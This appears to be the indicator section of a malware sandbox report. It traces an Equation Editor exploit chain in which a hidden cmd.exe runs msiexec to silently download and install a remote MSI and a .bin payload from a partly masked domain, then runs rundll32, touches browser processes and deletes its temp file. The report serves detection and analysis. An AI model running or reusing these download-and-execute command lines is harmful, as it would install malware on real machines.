Technical Information
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://www.ec#####enteacvarii.ro/wp-/wml/send.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- firefox.exe process, nss3.dll module
- %WINDIR%\installer\msid599.tmp
- http://www.ec#####enteacvarii.ro/wp-/wml/send.msi
- http://www.ec#####enteacvarii.ro/wp-/bin_iwlTOFWjHT250.bin
- DNS ASK ec#####enteacvarii.ro
- '%WINDIR%\installer\msid599.tmp'
- '%WINDIR%\syswow64\cmd.exe' & /C CD C: & msiexec.exe /i http://www.ec#####enteacvarii.ro/wp-/wml/send.msi /qn' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /i http://www.ec#####enteacvarii.ro/wp-/wml/send.msi /qn
- '%WINDIR%\syswow64\rundll32.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSID599.tmp"